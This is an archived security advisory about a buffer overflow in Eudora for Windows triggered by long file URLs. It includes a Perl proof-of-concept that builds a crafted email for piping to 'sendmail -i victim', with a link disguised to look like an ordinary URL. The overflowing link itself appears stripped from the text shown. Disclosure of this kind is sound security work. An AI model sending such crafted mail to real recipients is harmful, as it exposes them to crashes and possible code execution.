Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: hack1194.htm

Eudora file URL buffer overflow



Eudora file URL buffer overflow

There is a buffer overflow in Eudora for Windows, verified on versions
6.1, 6.0.3 and 5.2.1. This is easily exploitable to run arbitrary code.
I do not know if this issue affects Eudora for Macs.

Demo:

#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";
print "\n";
print "\n";
print "Fake URL to http://anywhere/I/want\n"; 
print "\n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n" ;
print "is for comparison: the user can hardly tell them apart.\n\n";

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/ 
School of Mathematics and Statistics  University of Sydney   2006  Australia


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH